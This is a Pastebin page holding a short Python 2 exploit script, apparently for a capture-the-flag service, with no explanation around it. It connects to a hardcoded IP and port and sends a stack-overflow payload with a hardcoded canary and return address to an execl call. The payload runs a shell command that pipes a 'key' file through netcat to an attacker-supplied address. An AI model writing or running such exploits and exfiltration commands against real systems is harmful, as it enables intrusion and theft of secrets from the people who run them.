SHARE
TWEET

angry.py

a guest Feb 23rd, 2014 313 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2. import struct
  3. import sys
  4.  
  5. HOST = '58.229.183.18'
  6. PORT = 8888
  7.  
  8. # Connect
  9. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  10. s.connect((HOST, PORT))
  11. s.settimeout(4)
  12.  
  13. s.recv(4096)
  14. s.recv(4096)
  15. s.recv(4096)
  16. s.recv(4096)
  17. s.recv(4096)
  18.  
  19. s.send("4\n")
  20.  
  21. s.recv(4096)
  22.  
  23. # orig stack addr
  24. stack_addr = 0xbfb0a7d8 - 0x28 + 0x10
  25.  
  26. canary = struct.pack("<I", 0x84c38b00)
  27. stack_1 = struct.pack("<I", stack_addr)
  28.  
  29. rest = "b3e863b7e8a7b0bf".decode('hex')
  30.  
  31. # 0x08048C79 -- call _execl
  32. ret = struct.pack("<I", 0x08048C79)
  33.  
  34. payload_ptr = struct.pack("<I", stack_addr + 0x14)
  35. payload2_ptr = struct.pack("<I", stack_addr + 0x1c)
  36. payload3_ptr = struct.pack("<I", stack_addr + 0x1f)
  37. arg2_ptr = struct.pack("<I", 0x0804970a)
  38.  
  39. s.send("yAAAAAAAAA" + canary + stack_1 + rest + ret + payload_ptr + arg2_ptr + payload2_ptr + payload3_ptr + "\x00\x00\x00\x00" + "/bin/sh\x00-c\x00cat key | nc <your_ip_here> 5001\x00")
  40.  
  41. print s.recv(4096)
  42. print s.recv(4096)
RAW Paste Data
Top